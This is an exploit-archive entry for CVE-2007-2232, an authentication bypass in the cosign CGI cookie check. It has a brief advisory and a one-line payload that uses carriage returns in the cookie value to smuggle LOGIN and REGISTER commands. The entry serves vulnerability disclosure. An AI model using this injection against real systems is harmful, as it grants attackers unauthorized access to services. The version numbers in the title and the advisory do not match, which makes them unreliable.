Cosign 2.0.1/2.9.4a - CGI Check Cookie Command Remote Authentication Bypass
| EKU-ID: 34975 | CVE: CVE-2007-2232;OSVDB-34833 | OSVDB-ID: |
| Author: Jon Oberheide | Published: 2007-04-11 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 34975 | CVE: CVE-2007-2232;OSVDB-34833 | OSVDB-ID: |
| Author: Jon Oberheide | Published: 2007-04-11 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/23422/info The 'cosign' application is prone to an authentication-bypass vulnerability because it fails to adequately sanitize user-supplied input. An attacker can exploit this issue to gain unauthorized access to services hosted on an affected computer. Versions prior to 1.9.4b and 2.0.2a are vulnerable. cosign=X\rLOGIN cosign=X 1.2.3.4 username\rREGISTER cosign=X 1.2.3.4 cosign-servicename=Y